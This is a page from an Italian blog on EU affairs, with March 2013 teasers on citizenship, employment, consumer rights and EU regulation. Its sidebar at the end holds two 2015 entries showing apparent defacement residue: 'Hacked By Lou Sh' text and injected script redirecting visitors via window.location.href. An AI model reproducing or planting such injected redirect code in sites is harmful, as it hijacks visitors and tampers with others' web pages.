EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Marzo 2013
it

Le istituzioni europee si sono sempre interessate a costruire un legame molto forte con i propri cittadini. L’obiettivo è quello di avvicinare gli organi istituzionali agli abitanti dell’Unione e coinvolgerli in un dialogo sovranazionale, cercando anche di capire ciò che ancora non è ben chiaro. La nuova indagine Eurobarometro ha inteso sondare la conoscenza degli europei sui diritti relativi alla cittadinanza europea.

Il 2013, Anno Europeo dei cittadini, rappresenta un periodo estremamente importante e fondamentale per le istituzioni europee il cui obiettivo è quello di avvicinarsi sempre di più ai cittadini e renderli maggiormente informati sui loro diritti. Tutto il 2013 sarà incentrato proprio su questo (...)

it

Ha preso il via anche quest’anno “Nuovi talenti per l’Europa”, il concorso che coinvolge i giovani, realizzato in collaborazione con le Istituzioni nazionali e quelle europee. Per partecipare al concorso basta inviare un videoclip sulla “Cittadinanza europea” e i suoi vantaggi.

Lo scopo del contest, che rientra nell’operazione Nuovi Talenti lanciata dalla Rai nel 2008, è di rintracciare i talenti emergenti italiani per aprire così al dialogo e al confronto verso le nuove generazioni. Il concorso ha da poco avuto inizio e terminerà il 3 giugno 2013, quando una giuria (...)

it

Il 28 febbraio è stata la Giornata delle Malattie Rare 2013. In questa occasione l’UE si è voluta mobilitare per aiutare e sostenere economicamente attraverso il contributo della Commissione europea 26 nuovi progetti di ricerca con l’obiettivo di trovare una valida soluzione per combattere le malattie rare.

Nelle parole della Commissaria Europea per la ricerca, l’innovazione e la scienza Máire Geoghegan-Quinn “La maggior parte delle malattie rare colpisce i bambini e comporta patologie genetiche devastanti, causando un grave deterioramento della qualità della vita e la morte prematura. Ci auguriamo (...)

it

Dato che il numero dei cittadini stranieri che si recano nei territori dell’Ue è in aumento, Bruxelles ha deciso di creare un sistema comune di registrazione elettronica lungo tutte le sue frontiere.

Le nuove tecnologie consentirebbero di semplificare la vita agli stranieri che si recano di frequente nell’Ue e monitorare meglio i cittadini di paesi terzi che attraversano le frontiere. Tramite un pacchetto di proposte legislative, chiamato “Smart Border”, la Commissione Europea interviene su (...)

it

Il Consiglio dei Ministri europei occupazione e affari sociali ha dato l’ok al piano di garanzie per i giovani proposto dalla Commissione UE per aiutare a combattere la disoccupazione giovanile, sempre più cappio al collo in questo tunnel della crisi senza apparente via d’uscita. L’accordo politico prevede l’immissione nel mercato del lavoro entro quattro mesi dalla fine degli studi

Lo diciamo da sempre e non ci stancheremo mai di sottolinearlo, a fare le spese delle crisi sono soprattutto i giovani, che sbattono sempre più frequentemente i loro musi sui cancelli chiusi del mercato del lavoro. Non sorprendono, pertanto, i dati Istat sulla disoccupazione a gennaio, che ci (...)

it

Secondo il rapporto reso noto dalla Commissione europea la scorsa settimana, il divario retributivo di genere, ovvero la differenza media di retribuzione oraria di uomini e donne in area UE, è ancora al 16,2%.

Tali dati risalgono al 2010 e indicano una lieve tendenza al ribasso rispetto agli anni precedenti, in cui questa cifra era ferma al 17%. I numeri emanati dalla Commissione sono giunti alla vigilia della terza Giornata europea per la parità retributiva, celebrata quest’anno lo scorso 28 (...)

it

Prosegue l’impegno delle istituzioni europee per assicurare, ad ogni categoria dei propri cittadini, uguali diritti. Questa volta ad essere disciplinato è stato il settore del trasporto in autobus. E’ infatti entrato in vigore il regolamento 181 del 2011 in cui vengono sanciti sia i diritti delle persone che decidono di spostarsi in autobus nell'UE sia le responsabilità e gli obblighi delle compagnie che offrono il servizio. La normativa sarà applicata sia per tratte brevi sia per tragitti più lunghi.

L’Unione europea continua a lavorare per garantire ai propri cittadini una vita migliore e una maggiore tutela e protezione in ogni campo. Così il 1° marzo 2013 è entrato in vigore il nuovo regolamento europeo che va a disciplinare il settore del trasporto effettuato con autobus. La normativa (...)

it

Siamo ormai tutti consapevoli che l’accesso alla rete avviene sempre più di frequente attraverso dispostivi wireless come smartphone, tablet e macchine dotate di sensori e quindi l’Ue per essere al passo con i tempi deve adeguarsi in materia di reti mobili attraverso un miglioramento nel trasferimento di dati ed il loro ingente utilizzo. Entro il 2020 si arriverà ad un traffico dati che sarà 33 volte maggiore rispetto al 2010 e quindi l’esigenza di potenziare la tecnologia è sempre più forte.

Ormai tutti i settori utilizzano mezzi digitali e quindi le aziende e i cittadini devono avere la possibilità di poter fare affidamento su un accesso ad internet che sia facile, veloce e attendibile. Questo non solo porterà miglioramenti alle aziende ma consentirà a tutti i cittadini europei di (...)

it

Secondo l'OMS (Organizzazione mondiale della sanità), rientrano nella definizione di mutilazioni genitali femminili (MGF) quelle pratiche che comportano la rimozione parziale o totale degli organi genitali esterni femminili e tutte le azioni lesive di questi stessi organi, non effettuate per motivi medici.

Sempre più spesso le MGF vengono praticate per motivazioni culturali, sociali e/o religiose, ai danni di bambine e ragazze, dalla più tenera età fino ai 15 anni. Queste pratiche generano gravi conseguenze sia sul piano fisico che psicologico e costituiscono una forma di abuso di minori e di (...)

it

864.000 posti di lavoro in Europa entro i prossimi due anni. Secondo un recente studio di Empirica a tanto ammonterebbe il divario occupazionale nel settore digitale, che la Commissione UE si prepara a colmare con la “Grande Coalizione” con il settore privato

La crisi economica ha creato più di 26 milioni di disoccupati in Europa. Una cifra impressionante, ma ancor più impressionante è che nonostante tale situazione ogni anno aumenta di 100mila unità il numero di posti nel settore delle tecnologie dell’informazione e della comunicazione, difficili da (...)

it

Che futuro per l’Europa? Quale Europa vogliamo? Cosa può fare Bruxelles per combattere la crisi e dare risposte concrete agli interrogativi sull’economia reale, sul sostegno alle imprese, sull’occupazione? Sono una parte delle domande che saranno al cento del terzo appuntamento dei «Dialoghi con i cittadini», promossi dalla Commissione europea in occasione dell’Anno europeo dei cittadini.

Il prossimo 18 marzo a Roma il vicepresidente della Commissione europea responsabile per l’Impresa e l’imprenditoria, Antonio Tajani, incontrerà giovani, studenti universitari, cittadini e rappresentanti di organizzazioni non governative, associazioni di categoria ed enti locali, per confrontarsi (...)

it

Sostenere le eccellenze del settore primario è una chiave per farci sentire più europei, nello spirito e nelle idee.

Il 2013 è l’Anno europeo dei cittadini ma già in questi primi mesi stanno emergendo con forza temi legati alle problematiche delle imprese in Europa. Solo per citare un esempio che riguarda il nostro Paese, con un progetto chiamato "Sosteniamo le Eccellenze" la banca Cariparma ha stanziato un (...)

it

L’Isfol, istituto per lo sviluppo della formazione professionale dei lavoratori, opera da anni in collaborazione con i maggiori enti europei tra cui il Ministero del lavoro, amministrazioni statali, Regioni, Provincie autonome ed enti locali con l’obiettivo di formare ed orientare al meglio le politiche sociali del lavoro per far aumentare i tassi occupazionali soprattutto nel settore giovanile. Nel 2012 ha deciso di proporre un nuovo prontuario, dopo l’ultimo pubblicato quattro anni fa, dal titolo “Manuale dello stage in Europa”, per favorire lo sviluppo di tirocini, stage e apprendistati in Europa.

La guida si suddivide in 3 capitoli: nel primo vengono illustrate le motivazioni per le quali è importante fare uno stage a livello europeo e i vantaggi che può offrire soprattutto ai giovani che si trovano in un percorso di studi. E’ di utile supporto soprattutto perché rispetto alle altre nazioni (...)

it

In queste settimane l'Unione europea sta invitando la popolazione a ragionare riguardo uno degli strumenti che tutti quanti utilizziamo in grandi dosi e che, per questo, non è oggetto di sufficiente attenzione: la plastica. Come un materiale così duraturo può essere smaltito efficacemente? La soluzione da trovare deve essere permanente, basta pensare infatti che i rifiuti plastici, soprattutto quando raggiungono gli ambienti marini (purtroppo spesso in questo periodo), possono impiegare centinaia di anni per decomporsi.

"I rifiuti di plastica e la loro gestione rappresentano una grande sfida per la tutela dell’ambiente, ma sono anche una formidabile occasione per rendere più efficienti le nostre risorse. In un’economia circolare, in cui più si ricicla più si sopperisce alla scarsità delle materie prime, sono (...)

it

Nella proposta di risoluzione sull'integrazione dei migranti, gli effetti sul mercato del lavoro e la dimensione esterna del coordinamento in materia di sicurezza sociale presentata dal Parlamento europeo vengono considerati alcuni punti fondamentali relativi alla demografia europea, all'età anagrafica dei suoi abitanti, all'occupazione e alle future prospettive di competitività nel campo del lavoro che dovranno essere affrontate.

Viene rilevato quindi che la popolazione europea in età lavorativa è in diminuzione dal 2012 e che senza l’immigrazione, tale tendenza è destinata a peggiorare. Riferendosi poi ai sondaggi dell’Eurobarometro, viene riportato che il 70% dei cittadini UE considera gli immigrati necessari al (...)

it

Che gli stipendi italiani non fossero tra i più alti in Europa è ormai un dato rinomato: oggi la conferma ci viene data anche dalla “classifica dei salari”, dove l’Italia si piazza al dodicesimo posto sui ventisette Paesi dell’Ue.

Secondo i dati Istat la retribuzione lorda è stata, negli scorsi anni, inferiore a quella di Germania, Francia e Regno Unito; in questo conto inoltre sono stati considerati solo i lavoratori con contratto a tempo indeterminato e full time, escludendo dunque la vera realtà lavorativa italiana, (...)

it

Da lunedì 11 marzo è scattato in tutti i Paesi dell’Unione Europea il divieto per la produzione e la vendita di prodotti cosmetici testati sugli animali.

È la tappa conclusiva di un iter legislativo durato molti anni. Già nel settembre del 2004, un regolamento proibiva di testare sugli animali i prodotti finiti. Poi nel marzo del 2009 l’ultimatum fissato tramite un regolamento che imponeva di porre fine anche alla sperimentazione del singolo (...)

it

Un triangolo capovolto per avvisare i pazienti riguardo possibili effetti collaterali dei medicinali. E' la novità che troveremo nel foglio illustrativo dei prodotti farmaceutici dopo la disposizione della Commissione Europea delle settimane scorse.

Ci sarà un nuovo simbolo all’interno del foglietto illustrativo di alcuni medicinali. Questa la disposizione della Commissione Europea, che lo scorso 7 Marzo ha deciso di adottare un triangolo capovolto per segnalare i medicinali sottoposti a trattamenti addizionali.Accanto al nuovo simbolo, (...)

it

The elections saw the success of a new political movement - the 5 Stars Movement (5SM) - lead by comic actor Beppe Grillo, whose name in Italian mean cricket. Much like the first Berlusconi, Grillo is anti-establishment, promises a renewal of politics and used his personal wealth to set-up the movement. Unlike Silvio Berlusconi, he has no personal economic interest to defend and this makes him more credible, but also possibly far more disruptive, especially in foreign policy terms, potentially transforming Italy into an unreliable partner for both Europe and the US

Traditionally, Italian foreign policy is based on five pillars, each responding to one or more domestic needs: European integration, Transatlantic Relations, Mediterranean & Middle East and the Balkans. The 5SM program does not mention foreign policy. Yet, Grillo’s ideas are easily (...)

it

Gli interessati hanno tempo fino al 14 agosto 2013 per presentare la loro richiesta. Il numero dei partecipanti è abbastanza esiguo come era lecito attendersi: saranno solo 1000 i ricercatori che avranno l'opportunità di sfruttare l'ingente sovvenzione fornita dall'Unione europea. Oltre a questo, la Commissione ha specificato che continuerà ad offrire comunque borse di studio individuali nell'ambito delle nuove azioni Marie Skłodowska-Curie, inserite nel programma Horizon 2020, che vedrà la luce il prossimo anno, il 2014.

Le "Azioni Marie Curie" sono delle sovvenzioni istituite già da qualche anno che mirano ad ampliare e specificare i percorsi di screening dei ricercatori. Le cifre promosse dall’attività sono molto consistenti, anche se mai come questa volta la Commissione si era spinta tanto oltre: dal 2007 al (...)

it

Il numero delle vittime a causa di incidenti stradali nel 2012 è diminuito sensibilmente soprattutto in riferimento al 2011 in cui c’era stata solamente una diminuzione del 2%. Nel 2012 invece si è registrato un traguardo veramente soddisfacente: ben il 9% in meno di incidenti sulle strade dei paesi membri dell’Ue. Il numero di vittime si diversifica nei vari paesi europei, si è registrato però che i paesi che hanno subito meno incidenti stradali (30 decessi per ogni milione di abitanti) sono la Svezia, il Regno Unito, la Danimarca e i Paesi Bassi.

L’obiettivo che l’Ue si prefissa di raggiungere entro il 2020 è la diminuzione annua costante del 7% degli incidenti stradali. Le vittime che purtroppo più spesso sono coinvolte negli incidenti sono le fasce più fragili della popolazione quali anziani, pedoni e motociclisti. Il progetto sulla (...)

it

Dopo il successo dell’edizione passata, la Rappresentanza italiana della Commissione europea, in collaborazione con l’Associazione Giornalisti Scuola di Perugia e con il patrocinio del Consiglio nazionale dell’Ordine dei giornalisti, torna a premiare il talento dei giovani europei. Sono aperte infatti le candidature per l’edizione 2013 del “Premio per i giovani giornalisti iscritti alle Scuole di giornalismo”.

Sensibilizzare i giovani giornalisti ai temi di rilevanza europea così da ottenere, nel minor tempo possibile, una completa copertura giornalistica dei suddetti e un coinvolgimento maggiore della popolazione - anche in relazione all’Anno europeo dei cittadini (2013) - è l’intento che la (...)

it

“Diventare cittadini europei” è il concorso riservato a tutti gli studenti delle scuole secondarie di 1° e 2° grado italiane.

L’iniziativa, promossa dall’Associazione del consiglio dei comuni e delle regioni d’Europa (A.I.C.C.R.E.) e dal Consiglio italiano del movimento europeo (C.I.M.E) in collaborazione con l’associazione europea degli insegnanti-sezione italiana (A.E.D.E), il centro italiano di formazione europea (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France